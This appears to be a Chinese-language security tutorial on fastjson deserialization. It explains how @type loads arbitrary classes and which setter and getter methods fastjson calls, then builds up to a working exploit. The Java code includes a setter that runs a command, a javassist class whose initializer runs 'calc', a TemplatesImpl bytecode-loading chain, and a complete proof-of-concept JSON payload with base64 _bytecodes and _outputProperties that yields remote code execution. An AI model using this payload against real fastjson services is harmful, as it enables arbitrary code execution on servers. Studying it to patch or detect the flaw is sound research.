1.fastjson简单使用
User:
packagecom.naihe;publicclassUser{privateString name;privateintage;publicUser(){}publicUser(String name,intage){this.name=name;this.age=age;}publicStringgetName(){returnname;}publicvoidsetName(String name){this.name=name;}publicintgetAge(){returnage;}publicvoidsetAge(intage){this.age=age;}}
Demo:
packagecom.naihe;importcom.alibaba.fastjson.JSONObject;importcom.alibaba.fastjson.serializer.SerializerFeature;publicclassFS{publicstaticvoidmain(String[]args){User user1=newUser("小李",10);String JsStr1=JSONObject.toJSONString(user1);System.out.println(JsStr1);User user2=newUser("大李",100);String JsStr2=JSONObject.toJSONString(user2,SerializerFeature.WriteClassName);System.out.println(JsStr2);String str="{\"@type\":\"com.naihe.User\",\"age\":1000,\"name\":\"老李\"}";Object obj1=JSONObject.parse(str);System.out.println(obj1);Object obj2=JSONObject.parseObject(str);System.out.println(obj2);}}
由于fastjson调试起来过程比较复杂,在这里直接看关键点:
首先会获取字符串的第一对引号中的内容
如果内容为@type就会加载下一对引号中的类
在JavaBeanInfo.class中会获取类中所有详细详细
在这里匹配以set开头的方法
这里判断函数名长度大于4,且以set开头,非静态函数,返回类型为void或当前类参数个数为1个的方法
methodName.length()>=4&&!Modifier.isStatic(method.getModifiers())&&(method.getReturnType().equals(Void.TYPE)||method.getReturnType().equals(method.getDeclaringClass())))
函数名长度大于等于4非静态方法,以get开头且第4个字母为大写,无参数,返回值类型继承自Collection或Map或AtomicBoolean,或Atomiclnteger或AtomicLon的方法
methodName.length()>=4&&!Modifier.isStatic(method.getModifiers())&&methodName.startsWith("get")&&Character.isUpperCase(methodName.charAt(3))&&method.getParameterTypes().length==0&&(Collection.class.isAssignableFrom(method.getReturnType())||Map.class.isAssignableFrom(method.getReturnType())||AtomicBoolean.class==method.getReturnType()||AtomicInteger.class==method.getReturnType()||AtomicLong.class==method.getReturnType()))
其实本质就是fastjson会利用反序列化通过无参构造创建一个对象,不通过setter或getter方法进行赋值与输出操作
因此我们只需要找到满足条件的类就行,这里一般利用的是 TemplatesImpl链来加载字节码,从而rce等操作
下面我们来证明一下我们的观点
在setter方法中添加一段命令执行的代码
packagecom.naihe;publicclassUser{privateString name;privateintage;publicUser(){}publicUser(String name,intage){this.name=name;this.age=age;}publicStringgetName(){returnname;}publicvoidsetName(String name){this.name=name;Runtime.getRuntime().exec("clac");}publicintgetAge(){returnage;}publicvoidsetAge(intage){this.age=age;}}
Demo:
packagecom.naihe;importcom.alibaba.fastjson.JSONObject;publicclassDemo1{publicstaticvoidmain(String[]args){String str="{\"@type\":\"com.naihe.User\",\"age\":1000,\"name\":\"老李\"}";Object obj1=JSONObject.parse(str);}}
packagecom.naihe;importjavassist.CannotCompileException;importjavassist.ClassPool;importjavassist.CtClass;importjavassist.NotFoundException;importjava.io.IOException;importjava.lang.reflect.InvocationTargetException;importjava.lang.reflect.Method;publicclassDC{publicstaticvoidmain(String[]args)throwsInvocationTargetException,IllegalAccessException,NoSuchMethodException,InstantiationException,NotFoundException,CannotCompileException,IOException{//通过字节码构建恶意类ClassPool classPool=ClassPool.getDefault();String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";classPool.appendClassPath(AbstractTranslet);CtClass payload=classPool.makeClass("CommonsCollections3");payload.setSuperclass(classPool.get(AbstractTranslet));payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");byte[]code=payload.toBytecode();Method defineClass=ClassLoader.class.getDeclaredMethod("defineClass",String.class,byte[].class,int.class,int.class);defineClass.setAccessible(true);Classyyds=(Class)defineClass.invoke(ClassLoader.getSystemClassLoader(),"CommonsCollections3",code,0,code.length);yyds.newInstance();}}
packagecom.naihe;importcom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;importcom.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;importjavassist.ClassPool;importjavassist.CtClass;importjava.lang.reflect.Field;importjava.util.Base64;publicclassTL{privatestaticvoidsetFiledValue(Object obj,String fieldName,Object fieldValue)throwsException{Field field=obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj,fieldValue);}publicstaticvoidmain(String[]args){try{ClassPool classPool=ClassPool.getDefault();String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";classPool.appendClassPath(AbstractTranslet);CtClass payload=classPool.makeClass("CommonsCollections3");payload.setSuperclass(classPool.get(AbstractTranslet));payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");byte[]codes=payload.toBytecode();byte[][]_bytecodes=newbyte[][]{codes,};TemplatesImpl templates=newTemplatesImpl();setFiledValue(templates,"_bytecodes",_bytecodes);setFiledValue(templates,"_name","whatever");setFiledValue(templates,"_tfactory",newTransformerFactoryImpl());templates.newTransformer();}catch(Exceptione){e.printStackTrace();}}}
poc:
packagecom.naihe;importcom.alibaba.fastjson.JSON;importcom.alibaba.fastjson.parser.Feature;importcom.alibaba.fastjson.parser.ParserConfig;importjavassist.CannotCompileException;importjavassist.ClassPool;importjavassist.CtClass;importjavassist.NotFoundException;importjava.io.IOException;importjava.util.Base64;publicclassfastjson{publicstaticvoidmain(String[]args)throwsCannotCompileException,IOException,NotFoundException{ParserConfig config=newParserConfig();ClassPool classPool=ClassPool.getDefault();String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";classPool.appendClassPath(AbstractTranslet);CtClass payload=classPool.makeClass("CommonsCollections3");payload.setSuperclass(classPool.get(AbstractTranslet));payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");String str=Base64.getEncoder().encodeToString(payload.toBytecode());String text="{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\""+str+"\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ }}";Object obj=JSON.parseObject(text,Object.class,config,Feature.SupportNonPublicField);}}
fastjosn一般是使用TemplatesImpl链来进行攻击的,在上面其实已经分析过fastjson在反序列化的时候会调用满足条件的getter方法,因此就会调用TemplatesImpl类的getOutputProperties方法,然后通过getOutputProperties,调用newTransformer
仔细观察就会发现poc中将byte进行了base64加密,那么这是为什么了?
在调用deserialze时会执行base64解密
造成_bytecodes需要进行base64编码
